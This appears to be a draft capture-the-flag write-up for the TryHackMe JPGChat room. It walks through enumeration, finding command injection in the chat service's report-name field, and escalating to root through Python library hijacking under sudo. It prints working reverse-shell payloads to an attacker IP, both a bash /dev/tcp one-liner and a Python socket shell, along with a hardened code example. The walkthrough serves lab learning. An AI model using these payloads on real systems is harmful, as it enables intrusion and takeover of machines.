JPGChat CTF Writeup [DRAFT]
This is my first CTF Writeup, in this case for the JPGChat room on TryHackMe.
Enumeration
We first add an entry to /etc/hosts:
echo "10.10.A.B jpgchat.thm" >> /etc/hosts
Nmap shows only ports 22 and 3000 open.
add nmap screenshot
To interact with port 3000 we tried telnet and received the following text:
$ telnet jpgchat.thm 3000
Welcome to JPChat
the source code of this service can be found at our admin's github
MESSAGE USAGE: use [MESSAGE] to message the (currently) only channel
REPORT USAGE: use [REPORT] to report someone to the admins (with proof)
Mention the hint on tryhackme
So we now use nc to interact with it:
echo "[REPORT]" | nc jpgchat.thm 3000
And we get some more details:
Welcome to JPChat
the source code of this service can be found at our admin's github
MESSAGE USAGE: use [MESSAGE] to message the (currently) only channel
REPORT USAGE: use [REPORT] to report someone to the admins (with proof)
this report will be read by Mozzie-jpg
your name:
To find the repository, we went to github.com and searched for users: https://github.com/search?q=Mozzie-jpg&type=users
The repository is: https://github.com/Mozzie-jpg/JPChat
Looking through the code, we discovered this line, which passes the reporter's name straight into a shell command:
os.system("bash -c 'echo %s > /opt/jpchat/logs/report.txt'" % your_name)
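As an added illustration (not code from the JPChat repository), here is the same command construction beside a hardened replacement that writes the report file directly, with no shell involved. The log path and the name allow-list are assumptions for this demo; the service on the box writes to /opt/jpchat/logs/report.txt.

```python
import os
import re
import tempfile

# Constructed path for this demo so the example runs anywhere;
# the real service uses /opt/jpchat/logs/report.txt.
LOG_PATH = os.path.join(tempfile.mkdtemp(), "report.txt")

# Assumed allow-list for reporter names: letters, digits, _ . - only.
# Anything outside this set is something bash could treat as syntax.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def build_unsafe_command(your_name):
    """Rebuild the string the service hands to os.system(). It is only
    built here, never executed: the inner bash -c runs whatever the
    reporter types, so a ';' in the name ends the echo early."""
    return "bash -c 'echo %s > %s'" % (your_name, LOG_PATH)


def name_changes_command(your_name):
    """True if the name contains characters bash would interpret
    (separators, quotes, redirections, expansions) rather than print."""
    return SAFE_NAME.match(your_name) is None


def log_report(your_name):
    """Hardened version: validate the name, then append it to the log
    with open() so no character in the input can reach a shell.
    Returns True when the report was written, False when rejected."""
    if name_changes_command(your_name):
        return False
    with open(LOG_PATH, "a", encoding="utf-8") as fh:
        fh.write(your_name + "\n")
    return True


def read_log():
    """Return the log lines written so far (empty list if nothing yet)."""
    if not os.path.exists(LOG_PATH):
        return []
    with open(LOG_PATH, encoding="utf-8") as fh:
        return fh.read().splitlines()


if __name__ == "__main__":
    # Constructed sample name: the ';' becomes a command separator
    # in the unsafe string, but is simply rejected by log_report().
    print(build_unsafe_command("wes; echo injected"))
    print(log_report("wes"), log_report("wes; echo injected"), read_log())
```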
User Flag
So what we need is to break out of that echo command to get a reverse shell:
echo "[REPORT]\n username \n 0<&196;exec 196<>/dev/tcp/10.11.X.Y/4243; bash <&196 >&196 2>&196;" | nc jpgchat.thm 3000
Mention about the semicolon
Remember to have nc listening on that port on your attack machine:
nc -lvnp 4243
Now, as the wes user, we can read the user.txt flag.
Root Flag
Running sudo -l:
User wes may run the following commands on ubuntu-xenial:
(root) SETENV: NOPASSWD: /usr/bin/python3 /opt/development/test_module.py
So we can do Python library hijacking: the SETENV tag lets us set PYTHONPATH when running this command through sudo, so Python will look for modules in a directory we control first.
Let's check the Python script first:
wes@ubuntu-xenial:~$ cat /opt/development/test_module.py
#!/usr/bin/env python3
from compare import *
print(compare.Str('hello', 'hello', 'hello'))
So what we need is to create a compare.py file in a directory we point PYTHONPATH at, which will spawn a reverse shell when imported:
cd /tmp
echo "import sys,socket,os,pty;s=socket.socket();s.connect(('10.11.X.Y',int('8042')));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/sh')" > compare.py
Finally we can run this sudo command to get a root reverse shell:
sudo PYTHONPATH=/tmp/ /usr/bin/python3 /opt/development/test_module.py